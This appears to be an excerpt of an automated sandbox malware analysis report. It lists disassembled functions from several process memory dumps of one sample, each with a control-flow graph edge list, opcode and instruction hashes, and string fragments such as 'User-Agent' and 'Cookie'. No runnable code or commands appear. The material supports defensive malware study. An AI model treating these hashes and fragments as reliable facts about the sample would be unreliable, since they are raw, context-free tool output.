                                                                                                                                                                • Instruction ID: 1835c947e943b83780b4cd22295aa6014adf4b8c4f26172a25fa54c6c25ed047
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 61516F316442549FEF239F60CC85B9A77B8AF04744F0401DABA49FE0D6DBB09694CF69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 027714BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 38 27714bc-2771590 call 27714de call 2770c9c call 2771345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction ID: 443e740e63229586a96b899a25baebc676cc1c6ef315b6e964f3ec2fd23c94c0
                                                                                                                                                                • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction Fuzzy Hash: CD21DA724046149EDF03AF60C9C99A673ECEF40704F85096A9D89EF049FA749554CFE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02771345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 57 2771345-2771352 58 27713eb-27713ec 57->58 59 2771358-277135e 57->59 59->58 60 2771364-277137a 59->60 60->58 62 277137c-277138f 60->62 64 2771391-2771398 62->64 65 277139b-27713ab call 2770e7c 64->65 68 27713ad-27713e2 65->68 68->58
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: c18418e015073aebde6a2d486a5ba94792210602a3316be75c079c16e7e61c5c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: B2219031904216AFDF119F78C888B5DBBB5AF04714F058215FD59BB594D770E910CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 027714DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 69 27714de-2771590 call 2773653 call 2770c9c call 2771345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction ID: 9be023439c21f4178e71bb6f815313a5617ec5ecbb565cbc4abddc7b59534485
                                                                                                                                                                • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction Fuzzy Hash: 8B1140724046149EEF03AF60C9C88AA73EDAE40708B8509BA9D89EE449FE709154CEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02773F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 87 2773f0d-2773f29 call 2773653 call 277379f 92 2773f3b-2773f66 call 2773f78 * 3 87->92 93 2773f2b-2773f39 call 277401b 87->93 106 2773f71 92->106 101 2773f76-2773f77 93->101 106->101 107 2773f71 call 2773f78 106->107 107->101
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction ID: dee1f3bc44f52b6b022aa48a47762c96ad916b6e95fbb8d58c8600da25b4b5fe
                                                                                                                                                                • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction Fuzzy Hash: 7FF01C70588240AAEF423BB08C4D65D36B9AF42786F4405D1BA89BD0D4DE748550AE75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02774675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 133 2774675-277468d call 2773a1c 136 277468f-2774698 call 2773a6e 133->136 137 277469d-27746cd 133->137 136->137 140 27747e7-27747ec 137->140 141 27746d3-27746f5 137->141 141->140 143 27746fb-2774720 141->143 145 2774722-2774737 143->145 146 2774738-277475a 143->146 145->146 148 27747bf-27747c9 146->148 149 277475c-277477e 146->149 150 27747e0-27747e5 148->150 151 27747cb-27747dd call 2773673 148->151 149->148 155 2774780-27747a2 149->155 150->140 151->150 155->148 157 27747a4-27747bc 155->157 157->148
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 44b537cb1e4068c5e1e881590ee1f7ee45e42a8a86b306bee26c7f06f92b03ad
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: BB4183B6500209BFEF125F65CC48BDEBFBAEF80704F154069EA44AA254D730D640CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02774674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 108 2774674-2774680 109 277468b-277468d 108->109 110 2774686 call 2773a1c 108->110 111 277468f-2774698 call 2773a6e 109->111 112 277469d-27746cd 109->112 110->109 111->112 115 27747e7-27747ec 112->115 116 27746d3-27746f5 112->116 116->115 118 27746fb-2774720 116->118 120 2774722-2774737 118->120 121 2774738-277475a 118->121 120->121 123 27747bf-27747c9 121->123 124 277475c-277477e 121->124 125 27747e0-27747e5 123->125 126 27747cb-27747dd call 2773673 123->126 124->123 130 2774780-27747a2 124->130 125->115 126->125 130->123 132 27747a4-27747bc 130->132 132->123
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: d6447917f34d8b5c9dad2d9ff1ee3941ec9376b265dfa9459e706f737605c8be
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: D44161B6500209BFEF129F65CC48BEEBBBAEF80704F1540A9EA44AA254D7309640CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00B8093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 b8093e-b8095f call b80cc4 call b814bc call b83cc0 8 b80967-b80989 0->8 10 b8098f-b809d2 call b809d9 8->10 11 b80af1-b80af2 8->11 15 b80a3d-b80a76 10->15 16 b809d4-b809d5 10->16 19 b80a7e-b80a80 15->19 17 b80a3c 16->17 18 b809d7-b809e8 call b83653 16->18 17->15 21 b80aec call b80af3 18->21 30 b809ee-b80a10 18->30 19->21 22 b80a82-b80aae 19->22 21->11 22->21 27 b80ab0-b80abc 22->27 31 b80ac1-b80ae5 27->31 30->21 34 b80a16-b80a3b 30->34 31->11 37 b80ae7-b80aea 31->37 34->21 38 b80a41-b80a76 34->38 37->21 37->31 38->19
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: da7ca05d182f83af127f364aca65f5a39e3682622c12be431f8d6ebd2a216912
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 855180315443549FEB127F20CC85B9A77F8EF04B84F0401D9BA45FE0E6DAB09A94CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B814BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 b814bc-b814df call b814de 42 b814e1-b81500 call b80c9c 39->42 43 b81502-b81590 call b81345 * 6 39->43 42->43
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction ID: 9859aa73d91d984f498269e5d5c9d75708c5d803dd5b0322efbc2c344bf57cdf
                                                                                                                                                                • Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction Fuzzy Hash: 2F210172405614AFDB03BF60C9C9CA673ECEF40704F4509AAAD85EF059FA709155CBE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B81345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 59 b81345-b81352 60 b81358-b8135e 59->60 61 b813eb-b813ec 59->61 60->61 62 b81364-b8137a 60->62 62->61 64 b8137c-b8138f 62->64 66 b81391-b81398 64->66 67 b8139b-b813ab call b80e7c 66->67 70 b813ad-b813e2 67->70 70->61
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: bdfd0894db0d2458072cd7c281198af1b6bb76ec83cc2cb0d0dc0e2885bc4dde
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: C121AE31904216BFDB11EE78C844B5DBBF9AF04300F054265F955BB5A4D730A801CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B814DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 b814de-b81590 call b83653 call b80c9c call b81345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction ID: 4fe2599983199d25972f4d17d25c93d4725538b0c3c07a2cf6945b6739a1e3ce
                                                                                                                                                                • Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction Fuzzy Hash: 6911BF72404514AFEF03BF64C5C9CAA73ECEE40704B4509AAAD86EF45AFE709154CBE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B83F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 b83f0d-b83f29 call b83653 call b8379f 95 b83f3b-b83f66 call b83f78 * 3 90->95 96 b83f2b-b83f39 call b8401b 90->96 109 b83f71 95->109 104 b83f76-b83f77 96->104 109->104 110 b83f71 call b83f78 109->110 110->104
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction ID: 66ee34944db1ce85795d24834074fdf185ab01e1ada3324307dc9519e8458d0c
                                                                                                                                                                • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction Fuzzy Hash: D7F0F860988280EAEF403BB0C84A65D36F8AF50F05F0405D1BB89A90B6DE748650DFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 00B84674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 111 b84674-b8468d call b83a1c 114 b8469d-b846cd 111->114 115 b8468f-b84698 call b83a6e 111->115 118 b846d3-b846f5 114->118 119 b847e7-b847ec 114->119 115->114 118->119 121 b846fb-b84720 118->121 123 b84738-b8475a 121->123 124 b84722-b84737 121->124 126 b8475c-b8477e 123->126 127 b847bf-b847c9 123->127 124->123 126->127 133 b84780-b847a2 126->133 128 b847cb-b847dd call b83673 127->128 129 b847e0-b847e5 127->129 128->129 129->119 133->127 135 b847a4-b847bc 133->135 135->127
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 6547ce04c78843a9a1684fe4647091bc56b7b55abde43f0b53516e2daf779c93
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: D44163B6500209BFEF129F65CC44BEEBFF9EF80704F154099EA44AA254D770DA40CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B84675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 136 b84675-b84680 137 b8468b-b8468d 136->137 138 b84686 call b83a1c 136->138 139 b8469d-b846cd 137->139 140 b8468f-b84698 call b83a6e 137->140 138->137 143 b846d3-b846f5 139->143 144 b847e7-b847ec 139->144 140->139 143->144 146 b846fb-b84720 143->146 148 b84738-b8475a 146->148 149 b84722-b84737 146->149 151 b8475c-b8477e 148->151 152 b847bf-b847c9 148->152 149->148 151->152 158 b84780-b847a2 151->158 153 b847cb-b847dd call b83673 152->153 154 b847e0-b847e5 152->154 153->154 154->144 158->152 160 b847a4-b847bc 158->160 160->152
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000027.00000002.2914026861.0000000000B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_39_2_b80000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 4bca4db7e7473a6a080133417cde99c004acb31b82f767ff5812d1cea330057b
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: C64185B6500209BFEF126F65CC48BDEBFF9EF80704F154099EA44AA254D770DA40CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 008B093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 8b093e-8b095f call 8b0cc4 call 8b14bc call 8b3cc0 8 8b0967-8b0989 0->8 10 8b098f-8b09d2 call 8b09d9 8->10 11 8b0af1-8b0af2 8->11 15 8b0a3d-8b0a76 10->15 16 8b09d4-8b09d5 10->16 19 8b0a7e-8b0a80 15->19 17 8b0a3c 16->17 18 8b09d7-8b09e8 call 8b3653 16->18 17->15 21 8b0aec call 8b0af3 18->21 30 8b09ee-8b0a10 18->30 19->21 22 8b0a82-8b0aae 19->22 21->11 22->21 27 8b0ab0-8b0abc 22->27 31 8b0ac1-8b0ae5 27->31 30->21 34 8b0a16-8b0a3b 30->34 31->11 37 8b0ae7-8b0aea 31->37 34->21 38 8b0a41-8b0a76 34->38 37->21 37->31 38->19
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: bc1375bfcc6c4fb9afce2438148d27e5bf9eb47df47ef3f40a3630ce9db3f32e
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: BF51A2316443549FEF225F20CC85BEA7BB8FF04740F040599BA45FE1D6DAB09A94CE66
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 008B14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 8b14bc-8b14df call 8b14de 42 8b1502-8b1590 call 8b1345 * 6 39->42 43 8b14e1-8b1500 call 8b0c9c 39->43 43->42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                • Instruction ID: a4c3dd8f05a5e6ec52a3ec352e3bbcc1c28d6220781223147056b2e73db891f7
                                                                                                                                                                • Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                • Instruction Fuzzy Hash: 8121FA724046149EDF03AF60C9C98E673ECFF40704F8509AAA989EF14AFA749554CAE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 008B1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 59 8b1345-8b1352 60 8b13eb-8b13ec 59->60 61 8b1358-8b135e 59->61 61->60 62 8b1364-8b137a 61->62 62->60 64 8b137c-8b138f 62->64 66 8b1391-8b1398 64->66 67 8b139b-8b13ab call 8b0e7c 66->67 70 8b13ad-8b13e2 67->70 70->60
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: d749f03bcca02727905f4d669a52390228d67a0ad3c9bcaf37a2f8fdd1d5d4a3
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 56216D31904216AFDF119E78C849B9DBBF5AF08700F054215F955EF695D774A810CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 008B14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 8b14de-8b1590 call 8b3653 call 8b0c9c call 8b1345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                • Instruction ID: 03ec4dd54afb6a2419abe3608a8f3c16a3564e3952de0d1dc26e0dd47ae5e0ed
                                                                                                                                                                • Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                • Instruction Fuzzy Hash: 9111E9724046149EEF03AF64C5C8CEA73ECFF40704B8509AAAD85EF54AFE749154CAE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 008B3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 8b3f0d-8b3f29 call 8b3653 call 8b379f 95 8b3f3b-8b3f66 call 8b3f78 * 3 90->95 96 8b3f2b-8b3f39 call 8b401b 90->96 109 8b3f71 95->109 104 8b3f76-8b3f77 96->104 109->104 110 8b3f71 call 8b3f78 109->110 110->104
                                                                                                                                                                Memory Dump Source
